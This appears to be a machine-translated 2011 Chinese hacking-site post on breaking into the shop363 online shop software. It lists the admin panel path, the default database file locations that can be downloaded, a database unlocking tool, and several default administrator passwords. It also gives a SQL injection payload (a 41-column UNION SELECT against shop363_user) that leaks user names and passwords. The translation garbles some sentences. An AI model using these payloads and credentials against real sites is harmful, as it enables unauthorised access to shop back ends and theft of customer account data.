shop363 online program really pass to kill the exploit-vulnerability warning-the black bar safety net

2011-10-21T00:00:00
ID MYHACK58:62201132102
Type myhack58
Reporter 佚名
Modified 2011-10-21T00:00:00

Description

This app security is not very good, but one of the replace()function to write well, but did not find is how to write, and the injection of“space, select,%2 0, a+number, and/**/, etc. filter is empty. In searching out the loopholes in the statements a lot of trouble, I also do not write, directly to a drastic method to directly get the password of the account soon.

Keywords: technical support: shop363.net

Background address:/admin_shop363/

Database: Data_Shop363/Date_Shop363_shop. mdb Database decryption tool: AccessUnLock.exe Hack the account: admin password: actionshop363?

Standby database: Data_Shop363/Date_Shop363_shop. mdb is the default database bbs/data/#sjyshop363. mdb Forum database

Home retrieve password at the injection vulnerability to get a Shell not much use, but can broke some user name password direct access to ‘union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from shop363_user

The display is 7

Turn change for username password

You can also use the backend default password: action first The second Group: admin admin888 Third Group: admin admin(9 0% can directly into the background)

Form:tools,sniff3r